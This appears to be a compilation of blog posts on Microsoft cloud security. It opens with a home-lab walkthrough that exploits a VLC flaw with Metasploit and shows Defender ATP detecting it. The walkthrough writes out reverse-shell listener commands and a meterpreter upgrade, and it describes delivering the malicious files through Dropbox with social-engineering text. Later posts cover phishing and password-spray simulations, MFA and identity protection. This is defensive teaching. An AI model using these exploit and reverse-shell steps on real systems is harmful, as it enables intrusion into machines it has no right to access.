Go, hack yourself!

While talking about the protection mechanisms in modern cloud environments, one tends to forget the other side.

You must know your enemy in order to fight him successfully. Today we will build a lab to attack a modern Microsoft cloud environment that is protected by the brightest star in Microsoft’s security sky: Microsoft Defender ATP*.

*Windows Defender ATP was recently renamed to Microsoft Defender ATP, since it now also supports some functionality on MacOS (and more is planned)

But first, let’s move to the dark side. I am sure you have already heard of many of the tools attackers use today, but have you ever used them against your own machines? Let’s see how that works!

Our lab is simple:

  • 1 x Windows 10 1809, AAD joined, Intune managed, Microsoft Defender ATP secured, 100 % Cloud
  • 1 x Kali Linux with Metasploit

In case you don’t know it, Kali Linux is a Linux distribution that comes with many important attack and penetration-testing tools. Metasploit is a framework covering the complete kill-chain.

A kill-chain?

A kill-chain describes the process from the attacker’s first contact to the ‘promised land’ (whatever they are aiming to obtain).

Pic01: kill chain

Attack vectors are the attacker’s first contact with your property: he leaves a prepared USB stick in your company parking lot, he sends your users an email with an attachment or a link, or he attacks you with, e.g., a password spray attack.

In former times, once the attacker had accessed ‘patient zero’, the first computer, he was in. ‘In’ meant your managed environment, behind your firewalls. In modern concepts, there is no ‘in’ or ‘out’ anymore: clients are built to always sit in an open network. This is what makes one of the next steps harder: lateral movement. Hopping from one computer to the next was easier in former times, since everything inside the perimeter was considered ‘safe’. (Is this still the case in your environment? Go 100% cloud!)

To move laterally, the attacker would try to gain more permissions (admin etc.) and gather more information about your network and directory (e.g. Global Address List discovery).

Now, let’s start with the fun part of this post. On the left you can see the Metasploit console, on the right, you see our Windows 10 client:

Pic02: our setup

First, we must choose an exploit we can use on the Windows machine. I used exploit-db.com to find an appropriate exploit and decided on one targeting a popular video player, VLC:

Pic03: choose an exploit

This exploit is a so-called ‘use after free’ exploit: it abuses memory that the application has just freed.

Many exploits are already integrated into the Metasploit database; however, ‘my’ exploit wasn’t, since the VLC exploit is quite new. Exploit-db.com lets you download the exploit so that you can use it in Metasploit. After downloading, you just tell Metasploit to use it:

Pic04: use the exploit

With ‘show payloads’, you can examine the possible payloads of this exploit. When you read the description of the exploit, you see that its author recommends using only certain payloads, since others (e.g. the meterpreter payload) crash the application:

Pic05: show payloads

With ‘show options’ you can see which options need to be configured for the exploit:

Pic06: show options

In the options above, we see that the exploit will generate two MKV (video) files. The first has to be opened by the victim (the second has to reside in the same directory). We also see which settings are already set and which are still empty. The only missing setting is ‘LHOST’, the IP address of our attacking machine. So let’s set it:

Pic07: set LHOST

That’s it, we are ready to run the exploit:

Pic08: run the exploit
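Pulled together, the console steps above look roughly like this (the module path, file names and IP address are from my lab and will differ in yours):

```
msf > use exploit/windows/fileformat/vlc_mkv   # path as imported from exploit-db
msf exploit(vlc_mkv) > show payloads           # list compatible payloads
msf exploit(vlc_mkv) > show options            # see what still needs to be set
msf exploit(vlc_mkv) > set LHOST 192.168.1.10  # IP of the attacking Kali machine
msf exploit(vlc_mkv) > exploit                 # generates the two .mkv files
```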

As expected, Metasploit has generated the two .mkv files for us:

Pic09: here we go

Now, when we remind ourselves of the kill-chain diagram at the beginning, we need an attack vector. How do we distribute the .mkv files to the victim? Well, that is pretty easy: we can zip them and send them by email or – that’s what I did – put them on Dropbox and share them with the user. If you add a ‘social-engineering’ text, you can make sure the file gets watched, or better: double-clicked. (I just had to convince myself.)

The .mkv files are on the client now. Meanwhile, we need to set up a ‘listener’ on our attacking machine that waits for the victim to double-click the .mkv file. I decided to create a reverse shell handler (which is also the default payload option for the exploit):

Pic10: set up the listener

In the screenshot above, you can see that we ‘use’ an exploit again, in this case the handler “exploit/multi/handler”. We then set the payload and the ‘LHOST’ IP and are ready to run it:

Pic11: start the listener
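In plain commands, the listener setup above is roughly (payload name and IP as used in my lab):

```
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/shell/reverse_tcp  # plain reverse shell
msf exploit(handler) > set LHOST 192.168.1.10                 # our Kali machine
msf exploit(handler) > exploit                                # start listening
```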

The listener is now doing what it should: listening. I went to the Windows 10 machine and double-clicked the first .mkv file. After a few seconds, data started arriving at the listener and I finally got a Windows command prompt on my Kali Linux machine!

And what do you do when you have a command prompt on an unknown Windows machine? Exactly: I did a ‘DIR’:

Pic12: orientation

Ok, that was a hesitant first try, I must admit. Let’s get gutsy and start something:

Pic13: finally got some help with mental math (click to enlarge)

Pretty cool, isn’t it? Meanwhile on the good side of the planet, Microsoft Defender ATP started sending me first Alerts:

Pic14: ooh

In the artifact timeline we can see which application triggered the alert:

Pic15: artifact timeline

Uh-huh, VLC seems to be up to some bad stuff on one of the Windows clients in my environment 😊 As we can see in the process tree, ATP found exactly what our exploit was doing: it started using just-freed memory (as in the exploit description: ‘use after free’):

Pic16: process tree

Anyway, let’s try to get a step further. I will now try to upgrade the remote shell session to a meterpreter session. Meterpreter gives us more possibilities: you can easily run a keylogger, Mimikatz and much more. To upgrade to meterpreter, we put the remote session into the background by pressing Ctrl+Z. Then we use the module “shell_to_meterpreter”:

Pic17: trying to start a meterpreter session

With ‘sessions’ we can see the current remote shell session. We point shell_to_meterpreter at session 1 to tell it which remote shell session to upgrade, then we run it:

Pic18: not working somehow
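For reference, the upgrade attempt above boils down to these commands (in current Metasploit versions the module lives under ‘post/’; the session number is from my lab):

```
msf > sessions                                   # list active sessions; our shell is session 1
msf > use post/multi/manage/shell_to_meterpreter
msf post(shell_to_meterpreter) > set SESSION 1   # which shell session to upgrade
msf post(shell_to_meterpreter) > run             # attempts to stage meterpreter
```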

With that, ATP freaked out:

Pic19: new alerts in ATP (1)

And:

Pic20: new alerts in ATP (2)

And we didn’t get any new (meterpreter) session, but still have just the remote shell session:

Pic21: no new session

What happened? As we can see in the ATP machine timeline, it was ATP’s friend Windows Defender Antivirus that remediated our attempt to attack the machine with the meterpreter payload:

Pic22: friends will be friends (Windows Defender Antivirus did the job)

Which is good or bad, depending on the perspective. Let’s take a look at the complete alert history:

Pic23: alerts queue

What scared me a little here is the fact that all these alerts had an assigned severity of “medium”. So, you really must look into your medium alerts!

Windows Defender and Microsoft Defender ATP worked hand in hand in my scenario. However, I had access to the targeted machine and could execute arbitrary code (calc.exe). ATP recognized that – which is good, but wouldn’t it be even better if we could get a hint upfront?

Microsoft Defender ATP Threat and Vulnerability Management

Microsoft is currently rolling out this new feature to tenants worldwide. With TVM, ATP gathers information about the applications on your clients, the installed versions and the configuration. This data is then compared with Microsoft’s threat intelligence. That’s why ATP could tell me, even before my Windows 10 machine was attacked, that it had a vulnerability in an application called “VLC”:

Pic24: we could have known before

ATP even tells me which vulnerabilities are associated with the installed version of VLC:

Pic25: CVEs associated with the software version

You might have noticed that our CVE (the second one) is listed. When we click on this CVE, we get a description quite similar to the one on exploit-db.com:

Pic26: CVE details

Conclusion

I have just scratched the surface. After I had access to the target machine and was able to execute calc.exe, I gave up quite early when the meterpreter session couldn’t be established. There are many possibilities to obfuscate the payload to make it harder to recognize. The fact that ATP noticed that the VLC exploit used just-freed memory shows the real power of the tool: the power of behavioral analysis.

Threat & Vulnerability Management completes Microsoft Defender ATP. It gives you a vulnerability-based view of the application landscape of your environment and gives you prioritized advice on how to get rid of vulnerabilities before they get actively exploited.

However, to be able to judge the importance of tools like Microsoft Defender ATP, you must put yourself in the red team’s point of view. If you try to think like an attacker, you will better understand how to protect your environment. So … go, hack yourself!

Office ATP P2

Since the beginning of February 2019, Microsoft has been dividing Office ATP features into P1 and P2. Everything that was previously called “Threat Intelligence” now goes into Office ATP P2. In this article, I give a brief overview of the Office ATP P1 and P2 features and go deep into an exciting P2 feature called “Attack Simulator”.

But let’s start with P1. To be honest, I underestimated the value of Office ATP for a while. But meanwhile (while I was not watching), Microsoft added more and more functionality to mitigate the most common attack vectors:

  • Email
    • Links in body & attachments (fat client & OWA)
  • Links in documents
    • Office on Windows, iOS, Android
  • Links in Teams conversations
  • Files in
    • OneDrive
    • SharePoint
    • Teams

So, you say, you have Exchange Online and SharePoint Online, and those services use anti-virus anyway – so why would you need Office ATP?

ATP goes a step further: wherever you read “link” in the bullet list above, Office ATP replaces that link with one pointing to Microsoft servers. That means when your users click this link, e.g. to download a file, the file goes through all the Office ATP intelligence. So even if the link was OK during, say, delivery of the email, but the attackers changed the document on the server side in the meanwhile (after the initial scan), Office ATP will recognize that. This is called Safe Links.
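To illustrate the idea in code (the real rewriting happens server-side, so treat the host name and parameters below as an approximation of the Safe Links URL format, not a spec), the original target ends up URL-encoded inside a Microsoft-hosted redirector URL that can re-check the target at click time:

```python
from urllib.parse import quote, urlparse, parse_qs

def wrap_safelink(original_url: str) -> str:
    # Conceptual sketch: the real target is encoded into a 'url' parameter
    # of a Microsoft-hosted redirector (host name here is illustrative).
    return ("https://emea01.safelinks.protection.outlook.com/?url="
            + quote(original_url, safe=""))

def unwrap_safelink(wrapped_url: str) -> str:
    # What the redirector sees as the real target when the user clicks.
    return parse_qs(urlparse(wrapped_url).query)["url"][0]

wrapped = wrap_safelink("https://evil.example.com/invoice.docx")
print(wrapped)
print(unwrap_safelink(wrapped))  # the original URL is recovered at click time
```

This is also why the click (not just delivery) is the moment of truth: the redirector can re-scan the target even if it changed after the mail was scanned.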

With Safe Attachments, on the other hand, Microsoft even detonates your attachments! They take the attachment into a virtual environment and watch how it behaves in order to decide whether it is malicious.

How this looks in Teams, for example, was recently described by Matt Soseman: https://blogs.technet.microsoft.com/skypehybridguy/2019/02/18/microsoft-teams-protect-against-phishing-malware/

Looking deeper into P1 features

The services have improved over time. E.g., with “native link rendering” Microsoft displays the original link in the hover window instead of the Safe Links URL, so as not to confuse users:


Pic01: hover text

You must look into the status bar in order to see the “real” URL:


Pic02: Status bar

Of course, all these techniques are not the holy grail. As always: somebody finds an exploit (e.g. “baseStriker” in Safe Links) and Microsoft closes the gap afterwards.

It is also important to note that not all content on SharePoint goes through Office ATP. Instead, ATP uses a smart algorithm that takes guest and sharing activity into consideration. So whenever there is “external” activity on files, it will act.

Now, let’s shift gears and talk about the Office ATP P2 features

There are several features available here: with ‘Threat Tracker’ you get informed about the latest threats and their details. On the ‘Threat Dashboard’ you get reports about malware, spam and phishing that happened in your tenant. With ‘Explorer’ you get a powerful tool to hunt for threats in your environment.

You can integrate Windows Defender ATP here to find out to which machines a certain Email was delivered.

But let’s now come to the feature we will look closer at: Attack Simulator

Next to ‘Safe Links’ and ‘Safe Attachments’, teaching users not to click a link in a suspicious-looking email and not to open that attachment is maybe the most important mitigation. With Attack Simulator, Office ATP P2 helps you increase awareness among your users. You have three ‘attack campaigns’ (more to come):

  • Spear Phishing
  • Brute Force
  • Password Spray

Let’s start a Spear Phishing Attack:

With this Spear Phishing attack, we try to ‘steal’ credentials from the user by placing a link into an email we send, and getting them to click the link and provide their credentials.


Pic03: Launch Attack

Provide a name:


Pic04: Give it a name

Select people from your organization (you cannot use this against external users):


Pic05: Specify your targeted users

Provide a display name and From email address. This is what your targeted users will see in their email clients. You can choose a login server URL from a dropdown list; Microsoft monitors logins to these pages for you and reports on them. You can also optionally configure a custom landing page, which is displayed after the user logs in. Finally, specify a subject:


Pic06: Provide Details of the attack

Don’t be afraid: Microsoft does not track the credentials your users provide, nor do they check whether they are correct (I never entered real passwords in my tests and was always passed through to the landing page).

Then we have an email body editor, including an HTML source code editor. There are two variables you can use in the HTML body:

  • ${username}
  • ${loginserverurl}


Pic07: compose your poisoned Email

Together with the source code editor, we can create a hyperlink in the email that does not reveal the original URL at first glance (as you can see above):


Pic08: HTML view on the mail
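The two placeholders happen to use the same ${…} syntax as Python’s string.Template, so the substitution Attack Simulator performs per targeted user can be sketched like this (the HTML body, user name and login URL are of course made-up examples):

```python
from string import Template

# Hypothetical phishing body using the two variables Attack Simulator offers.
body = Template(
    '<p>Dear ${username},</p>'
    '<p>Please <a href="${loginserverurl}">confirm your mailbox settings</a> '
    'within 24 hours.</p>'
)

# The service fills these in for each targeted user.
mail = body.substitute(
    username="Hedi",                                  # example target
    loginserverurl="http://portal.example-login.xyz"  # example dropdown choice
)
print(mail)
```

The anchor text hides the real target, which is exactly why the status bar (or the Safe Links hover) is where users should look.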

That’s it – you get a final question asking whether you really want to proceed. If you click ‘Finish’, the attack fires:


Pic09: fire your attack

Now let’s see how this looks on the user’s side (here in OWA):


Pic10: user’s view in their inbox

When the user clicks on the mail, she gets prompted by the well-known Microsoft login dialogue (notice that Chrome already flags this as a ‘not secure’ site):


Pic11: user gets prompted

Whatever credentials you provide, you get forwarded to the specified landing page:


Pic12: Custom landing page

Back in Attack Simulator, you can look at the report of your attack:


Pic13: Report of the attack results

As you can see, we targeted one user with our attack and had one successful attempt (well, for the user it was anything but successful, because she clicked the link – but that’s another story). You can download a CSV listing all users and a description of their behavior.

The other available attacks run real password attacks against your user accounts. Either you provide a password list and see whether those passwords are used by the targeted users (brute force), or you specify just one password and use it against a broader set of users (password spray). You then get a report similar to the one already shown:
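The difference between the two attack types is easy to sketch: brute force iterates many passwords against one account, while a spray iterates many accounts for one password (which keeps each individual account under the lockout threshold). A toy illustration with made-up names:

```python
def brute_force(user, passwords):
    # Many password guesses against a single account.
    return [(user, pw) for pw in passwords]

def password_spray(users, password):
    # One guess per account, across many accounts.
    return [(u, password) for u in users]

attempts_bf = brute_force("hedi", ["Winter2018!", "Passw0rd", "Summer2019!"])
attempts_spray = password_spray(["hedi", "oliver", "matt"], "Winter2019!")

# Same number of attempts, very different detection/lockout profile:
print(len(attempts_bf), len(attempts_spray))
```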


Pic14: Report of BruteForce attack / Spray attack

Conclusion / A word of caution

I really like the Attack Simulator. With the available attack types, you can challenge your users, and that makes your environment more secure. But you must handle it with care. You should plan your ‘attacks’ very well and inform bodies like the workers’ council and data protection (and management). Then I would suggest you start a campaign for more security. Maybe you launch a dedicated website with tips and videos to improve user behavior. During this campaign, you mention somewhere in your user communication that you might also challenge them – so you warn them a little bit. Then, when they get ‘caught’, don’t be mad at them. Explain carefully what happened and how they can improve. Your users are your friends 🙂

When it comes to Safe Links and Safe Attachments, you can easily roll them out in a scoped manner. Just increase the number of targeted users over time. That way, you get a good impression of the impact they have.

AI, Protect Me!

Azure AD Identity Protection (IP) recently got a refresh (in preview). We will look into some of the enhancements. But first, a brief overview of what it is all about:

In a nutshell, IP handles two kinds of things:

  • Risky sign-ins
    • Is the authentication request really coming from the authorized user?
    • Can be triggered by:
      • Atypical travel (10 PM: sign-in from New York, 10:30 PM: sign-in from Frankfurt)
      • Anonymous IP address (e.g. Tor Browser)
      • Unfamiliar sign-in properties (takes past sign-ins into consideration and checks regularly used devices, locations and networks against the current sign-in)
      • Malware-linked IP address (Microsoft researches IP addresses that are associated with malware)
  • Risky users
    • Either a former sign-in was risky (see above)
    • Or credentials have been leaked and Microsoft found them on some dark-web marketplace or the like.

The calculation of the sign-in and user risks is done with the help of machine learning.

Keep in mind that all machine learning technologies need learning periods. E.g., ‘atypical travel’ needs about 14 days or 10 logins to learn the user’s sign-in behavior. ‘Unfamiliar sign-in properties’, in contrast, needs 30 days, during which it is passive. (See here for more info.)
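What makes the New York/Frankfurt example ‘atypical’ is the implied travel speed; a rough back-of-the-envelope check (city coordinates approximate):

```python
from math import radians, sin, cos, asin, sqrt

def haversine_km(lat1, lon1, lat2, lon2):
    # Great-circle distance between two points on Earth (radius ~6371 km).
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371 * asin(sqrt(a))

# 10:00 PM sign-in from New York, 10:30 PM sign-in from Frankfurt
distance = haversine_km(40.71, -74.01, 50.11, 8.68)  # roughly 6,200 km
speed = distance / 0.5                               # km/h over half an hour
print(f"{distance:.0f} km -> {speed:.0f} km/h")      # far beyond any airliner
```

Any sign-in pair implying a speed like this simply cannot be the same person travelling, which is why it is flagged.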

You can then create policies based on risky sign-ins or risky users. In the case of risky sign-ins, you can challenge users with MFA; in the case of risky users, you can prompt users for a password change (hopefully through SSPR); in both cases you can also block access.

That’s pretty much the basic functionality of Azure AD Identity Protection, except for one thing we didn’t talk about yet:

Reporting

This is where the freshness comes in. Microsoft is investing a lot of effort into a clean overview that makes it easy for the security administrator to see at a glance what is going on. In order to see how good the reporting in IP is, we need to set up the risk policies and then produce some risky sign-ins first.

Setup of Risk Policies

Pic1: IP Policies

Both user and sign-in risk policies consist of:

  • User scope (who will be affected by this policy)
  • Conditions (low, medium or high risk)
  • Controls

Pic2: Policy Controls

Now that the policies for sign-in risk and user risk have been set up and assigned to the users, let’s play around with them:

We sign in to Office 365 via the Tor Browser to anonymize our IP address:

Pic3: Tor Browser

Shortly after, we get a new risk, as you can see in the brand-new risky users report:

Pic4: Risky users

As you can see, we tried to log in to Office 365 and didn’t succeed. The location is also interesting: the sign-in seemingly happened somewhere in Italy (while I live in Germany) – this is because Tor proxies all requests through nodes in other countries.

In the ‘Basic Info’ tab, you get user info from Azure AD. ‘Risk events not linked to a sign-in’ is also interesting: Microsoft continuously screens dark places on the internet for leaked credentials. So if your credentials are sold anywhere out there, a risk is listed under ‘Risk events not linked to a sign-in’.

Until now, we do not know the actual reason for the risk. Let’s click on the risky sign-in to get to the risky sign-ins report:

Pic5: Risky sign-ins

Here we have it: ‘Anonymous IP address’ was (as expected) the reason for the risk.

Now your investigation as a security administrator starts. You will have to check with this user whether she used a Tor browser intentionally or whether somebody else tried to log on with her credentials. Once you have found out, you can click ‘confirm compromised’ or ‘confirm safe’. This will a) put the user at high risk if she really was compromised and b) help the machine learning, well …, learn.

Microsoft calls this “Smart Feedback” and this is also brand new (in preview).

This was an easy case (a user connecting through a Tor browser); as mentioned, your work starts after the risk is detected. You must investigate what’s really going on. So what you need are really good, clean reports that you can filter, sort and customize. With this refresh of Identity Protection, the risk reports have been enhanced a lot to support you in your daily job.

A word of caution: to test the policies easily, I set the condition to “low risk and above” and the scope to my “all users” group. After hitting OK, I immediately received the message below and couldn’t work with the portal anymore. I then had to re-authenticate and … was prompted to authenticate and then to change my admin password. As you can see, those risk policies really work:

Pic6: I am out!

So be careful whom you assign those policies to, and have a break-glass admin account (thankfully I had one) that you always exclude from all policies (also in conditional access).

But that’s not all

This risk report data is also available via the Graph API. Let’s have a look at how that works. We will use Graph Explorer to show which information we can also get programmatically:

https://developer.microsoft.com/en-us/graph/graph-explorer

You might have to give yourself the appropriate permission, if you see this:


You will need:


Make sure you are logged in to Graph Explorer and use the new beta API, then try for example “identityRiskEvents”:

Pic7: Graph explorer

When I do that, I see the same sign-in risk we saw earlier in the GUI:

Pic8: Graph response

As you can see, you even get some extra information, like the geographical data of the IP location.
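Programmatically, you would GET https://graph.microsoft.com/beta/identityRiskEvents with a bearer token and receive a JSON collection. A sketch of picking the anonymous-IP events out of such a response (the sample below is shortened and made up, and the exact field names of the beta API should be verified against the current docs):

```python
# Shortened, made-up example of what a beta identityRiskEvents response can
# look like. A real call would be:
#   GET https://graph.microsoft.com/beta/identityRiskEvents
#   Authorization: Bearer <token>
response = {
    "value": [
        {
            "riskEventType": "anonymousIpRiskEvent",
            "userDisplayName": "Hedi",
            "riskLevel": "medium",
            "location": {"city": "Milan", "countryOrRegion": "IT"},
        },
        {
            "riskEventType": "unfamiliarLocationRiskEvent",
            "userDisplayName": "Oliver",
            "riskLevel": "low",
            "location": {"city": "Hamburg", "countryOrRegion": "DE"},
        },
    ]
}

# Filter for the Tor-style events we produced above.
anonymous = [e for e in response["value"]
             if e["riskEventType"] == "anonymousIpRiskEvent"]
for event in anonymous:
    print(event["userDisplayName"], event["riskLevel"], event["location"]["city"])
```

Having the same data behind an API means you can feed it into your own SIEM or ticketing instead of working only in the portal.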

Christmas Special: Peace between Security and Usability (by the example of Multifactor Authentication in Azure AD)

One of the biggest problems of our times in IT is pacifying the long-lasting war between security and usability. We all know the picture below, which shows human behavior precisely: people will accept security when it is easy enough. Otherwise, they will find their own way around it:

Pic1: The easy way

For me, this leads to the conclusion that a system’s security design is only a good one (yes, also from a security perspective, not only from a user perspective!) when it allows people to behave naturally.

Some people in charge of IT security design secure systems for the sake of security, not thinking about the users. They think it is more important to have a secure design in place, and users will somehow handle it. They are not yet aware that people should be an important part of their designs, since people can circumvent whatever they designed.

Users will always ‘win’. In the end, the often-mentioned ‘young talents’ (and I think the older ones too) look for other employers when they are annoyed by too many virtual walls around them.

We somehow must marry security & usability in order to improve both.

One of the best examples of such a marriage is Microsoft’s implementation of multifactor authentication (MFA) in conjunction with conditional access:

When you require MFA for users that join a Windows 10 device to Azure AD:

Pic2: Require MFA for AAD join

Then, when you set up a new device and authenticate during OOBE …

Pic3: OOBE prompts for company credentials

… you get prompted for MFA:

Pic4: MFA prompt

In this scenario, I have disabled Windows Hello for Business (WHfB) to prove something I will come back to later. Here is where you can enable and disable WHfB:

Pic5: Where you disable WHfB for test purposes

So, after OOBE finished (as expected, I did not receive a prompt to set up WHfB during Windows installation), I logged in to Windows and could open Edge and connect to outlook.office365.com without an MFA prompt:

Pic6: Login to OWA without MFA prompt

The question is: why? Let’s take a look at the AAD sign-ins:

Pic7: Azure AD Sign-Ins

As we can see, the ‘MFA Result’ states that “MFA requirement (is) satisfied by claim in the token”.
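‘Claim in the token’ refers to the authentication method references (amr) claim inside the issued token. A quick sketch of decoding such a claim from a JWT payload segment (the payload below is a minimal made-up example, not a real Azure AD token):

```python
import base64
import json

# Made-up, minimal JWT payload: the 'amr' (authentication method references)
# claim lists how the user authenticated; 'mfa' in that list satisfies an
# MFA requirement without a fresh prompt.
claims = {"amr": ["pwd", "mfa"], "upn": "hedi@contoso.com"}
segment = base64.urlsafe_b64encode(json.dumps(claims).encode()).rstrip(b"=")

def mfa_satisfied(jwt_payload_segment: bytes) -> bool:
    # Re-pad and decode the base64url payload segment, then inspect 'amr'.
    padded = jwt_payload_segment + b"=" * (-len(jwt_payload_segment) % 4)
    decoded = json.loads(base64.urlsafe_b64decode(padded))
    return "mfa" in decoded.get("amr", [])

print(mfa_satisfied(segment))  # True -> no additional MFA prompt needed
```

So the device registration effectively “bakes” the second factor into the tokens issued for that user on that device.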

Now let’s log in from a different computer that is not AAD joined (or use a private browser session):

Pic8: MFA prompt from a non-AAD-joined PC (in German)

Here we get an MFA prompt, since conditional access is configured as follows:

Pic9: MFA enforced through conditional access

As you can see, we force MFA for Exchange here under all circumstances (you have to believe me on the latter).

Before we answer the question why I didn’t get prompted in the first place when logging in from an AAD-joined computer, we will take a look at a second scenario:

Registered Device (Workplace Joined, local Workgroup):

After installing a stand-alone Windows 10, I had to do MFA to connect to OWA (as expected):

Pic10: connect to OWA from stand-alone machine

Pic11: MFA prompt on stand-alone machine

Then I registered the device in AAD:

Pic12: register device in AAD

Again, I had to use MFA in order to register the device:

Pic13: MFA prompt when registering the device in AAD

After successfully registering the device (incl. MFA), I was able to access outlook.office365.com without any further MFA prompts.

Again, in the sign-ins, you can see that MFA was satisfied through a claim in the token:

Pic14: MFA requirement satisfied from registered device

So again: why don’t we see MFA prompts from registered and AAD-joined devices? The answer can be found in a Microsoft FAQ:

Q: Why do some of my users do not get MFA prompts on Azure AD joined devices?

A: If user joins or registers a device with Azure AD using multi-factor auth, the device itself will become a trusted second factor for that particular user. Subsequently, whenever the same user signs in to the device and accesses an application, Azure AD considers the device as a second factor and enables that user to seamlessly access their applications without additional MFA prompts. This behavior is not applicable to any other user signing into that device, so all other users accessing that device would still be prompted with an MFA challenge before accessing applications that require MFA.

(https://docs.microsoft.com/en-us/azure/active-directory/devices/faq)

In addition, Microsoft also considers the device a second factor when it is enrolled (AAD joined) for Windows Hello for Business (without the MFA requirement during setup!). After WHfB enrollment, you are not prompted for MFA again either.

Conclusion

Imagine a scenario where a user sits on a train and logs in to Windows in order to read her mail. Let’s ignore WHfB for a moment. She types in her username and password and does not get prompted for MFA, since she works from a trusted (AAD-joined or registered) device. A rude woman behind her watches her type in username and password. That rude woman will then be very disappointed at home when she tries to log in to Office 365 with her victim’s credentials and gets prompted for MFA (especially because she hasn’t seen her victim have to do the same).

The beauty of Microsoft’s implementation of multifactor authentication becomes visible when you are NOT prompted for additional authentication methods. Security can show its strength when usability does not suffer from it.

Garage: Azure AD Terms of Use for B2B and AIP

As already mentioned, this blog will have detailed (long) posts and also shorter ones with a “garage character” that document features and solutions I evaluate. This is the first post in this ‘garage’ category.

To be honest, I believe this whole “terms of use” thing was triggered by this guy here. Oliver and I were in a project at a customer that wanted this functionality: users would have to accept some sort of terms of use before proceeding with a service. (Of course, we were not the only ones requesting this feature, but he was the first to chat about it with the Intune product group.) You can like this feature or not, and you can also doubt its value in a modern IT world, but sometimes it makes things easier (especially in bureaucratic Germany) and you don’t want to fight every fight.

Anyway: Microsoft has started to expand this functionality. You can now have users accept the terms of use (TOU) on each device, and you can even expire the acceptance so that they have to re-accept it after a certain period of time.

It is also being expanded to other services (currently in public preview):

  • Intune Enrollment
  • B2B Users
  • AIP Documents

Let’s take a closer look at these use cases:

In all cases, you create a conditional access policy that requires the given users to accept your company’s terms of use. In this policy, we will combine the requirements for B2B users, Intune enrollment and AIP users. So we select “all guest users” for the B2B scenario and then specific users (Hedi) for the AIP and Intune demo (in the real world, you would probably select ‘all users’ here):


Next, you select the AIP cloud app and the Intune enrollment cloud app to indicate that these apps should bring up the terms of use when accessed:


Here you go: under access controls you then have the control “all users terms of use” (which is the name of the terms of use I created). Select it and enable the policy:


If you now share a document with a guest user via email …


… this guest user is prompted to accept the terms of use when opening the document you shared (as you can see, it adapts to your language :-)):


If you send someone an AIP-protected document (you don’t have to send it by mail; the terms of use are triggered when you authenticate against AAD, since that is when the conditional access policy fires) …


… the recipient also has to accept the terms of use when opening the document:


Conclusion

The more granular it gets, the better: you prompt your users to accept the terms of use only when it is absolutely necessary, without annoying them.

100% Cloud will never happen!

I like the idea of starting a brand-new blog by the name of “Empty Datacenter – 100% Cloud” and then writing the first article indicating that this will never happen.

But this is exactly what happens during the ‘cloud familiarization period’. The WHAT? Exactly.

During my journey from an on-premises-driven consultant for Exchange & Active Directory enterprise infrastructures to a cloud architect focusing on Office 365, Azure AD and Enterprise Mobility, I noticed from my own thoughts and behaviors, and from those of my colleagues and customers, that “being cloud minded” is not a binary category.

Most people understand a few core principles of what it means to be 100% cloud minded. But in my experience, the 100% cloud approach sinks deeper and deeper into one’s mind over time.

People (we all) need time to get used to new environments, paradigms and so on. This is what I call the ‘cloud familiarization period’ (and to be honest, I think this period never ends).

At the beginning of this period, it can happen that an IT colleague is totally familiar with the benefits of Office 365, completely convinced to move all company mailboxes to the cloud, and believes in the future of Microsoft Teams. But if you dig deeper, this IT guy does not really believe in the near end of ‘the file server’. Nor does he believe in empty datacenter halls, because ‘our SAP* servers will never go to the cloud during my career’ (*it does not have to be SAP, but you get the idea).

So, in my opinion, when talking about 100% cloud, you should keep an empty datacenter in mind as the vision. That means, after moving the entire Microsoft infrastructure to the cloud, your IT infrastructure could look like this:

pic1-1

Pic1

The main message of this picture is: move as much to the cloud as possible now, and treat the rest (your on-prem DC) as a cloud, too. But let’s proceed step by step.

First, moving the “basic” Microsoft environment means moving:

Mail & File

pic1-2

Pic2

  • Local Mail to Exchange Online
    • Considered as a no-brainer
  • User file servers to ‘SharePoint’
    • With the term “user file servers”, I want to exclude data that is still processed by local apps and the like. Moving everything from local file servers (and SharePoint servers) to OneDrive, Teams, SharePoint Online (and Groups) is technically not hard, but you must work hard on change management and user adoption.
  • Comment on Teams
    • As we all know, Teams is the successor of Skype for Business. It is quite easy to use Teams for chat, group chat, audio calls and conferences. It gets a bit harder if you also move telephony services to Teams, at least in an enterprise environment. Which feature to deliver with which tool must be well thought through.

The Client

Then, following the 100% cloud approach, you should move your clients to the cloud:

pic1-3

Pic3

So, what does this look like from a user perspective? The user receives a new laptop at his desk in the office, at home or wherever you want. He unpacks and starts it and runs into the out-of-box experience (OOBE). He types in username & password and the device automatically joins AAD. The device is then enrolled into Intune, and policy settings are applied. Intune also installs all user-specific software on the box, and after a while the user can log on to his new machine without IT ever having touched it. And the best part: no on-premises management service was involved. All client management (AAD, Intune etc.) is itself evergreen.

This client loves the freedom of the internet, calls the cloud its home and hates boundaries like proxy servers and firewalls.

Users, on the other hand, love this new client, since it supports collaboration instead of preventing it.

For this new freedom, we need new security concepts: concepts that keep the users’ global collaboration needs in mind, let them use the tools they need and give them more self-service possibilities so they can act fast. With these new security approaches, we also get the chance to improve the overall security of our systems, because we can leverage intelligent cloud solutions that “know” not only our system, but Microsoft environments of customers all over the world.

The following picture describes the difference between the old and the new security approach:

pic1-4

Pic4

So, in the new world, we must move away from the perimeter approach towards an entity security approach. Considering certain networks more trustworthy than others does not work in a mobile world where computers cross the company borders in the pockets of the employees.

When we start to protect all the entities in question (identity, device, services, documents), then we gain both: more security and more mobility.

Here, Microsoft offers a “defense-in-depth” product catalogue, all hosted in or connected to the cloud:

  • Identity Security
    • MFA
    • Identity Protection
    • Privileged Identity Management
    • RBAC
    • Monitoring/Auditing/Reporting
  • Device Security
    • Secure Boot & Integrity
    • BitLocker hard-disk encryption
    • Evergreen patching
    • Windows Hello for Business & passwordless sign-ins
    • Endpoint Protection with Windows Defender
    • Advanced Threat Protection
    • Credential & Exploit Guard
  • Service Security
    • Conditional Access & Compliance
    • Device Health Attestation
  • Document Security
    • Azure Information Protection
    • DLP

Until now, we have been talking about the “company-managed (Win 10) client”. In a 100% cloud approach, we also have to think about connecting other devices: mobile devices and private computers (Windows, Mac & maybe even Linux).

In upcoming posts, we will dig deeper into the mentioned security solutions and into the possibilities for mobile and private devices.

The last boxes in the basement

Now, let’s talk about the apps and services we have avoided talking about until now. There are hundreds of applications in your server rooms besides the “mail”, “file” and “collaboration/communication” services.

A 100% Cloud approach means to move them to the cloud. It’s as simple as that.

